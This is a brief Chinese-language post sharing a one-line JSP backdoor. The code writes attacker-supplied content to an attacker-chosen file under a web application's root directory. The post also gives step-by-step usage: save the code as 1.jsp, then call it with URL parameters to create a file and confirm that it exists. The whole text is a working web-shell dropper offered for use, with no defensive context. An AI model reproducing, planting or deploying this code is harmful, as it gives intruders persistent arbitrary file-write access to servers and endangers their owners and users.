復制代碼 代碼如下:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
這個 後門估計不用我說了吧.還是提示一下咯.保存為1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然後:http://localhost/1.txt 就出來了 內容為 hello .....
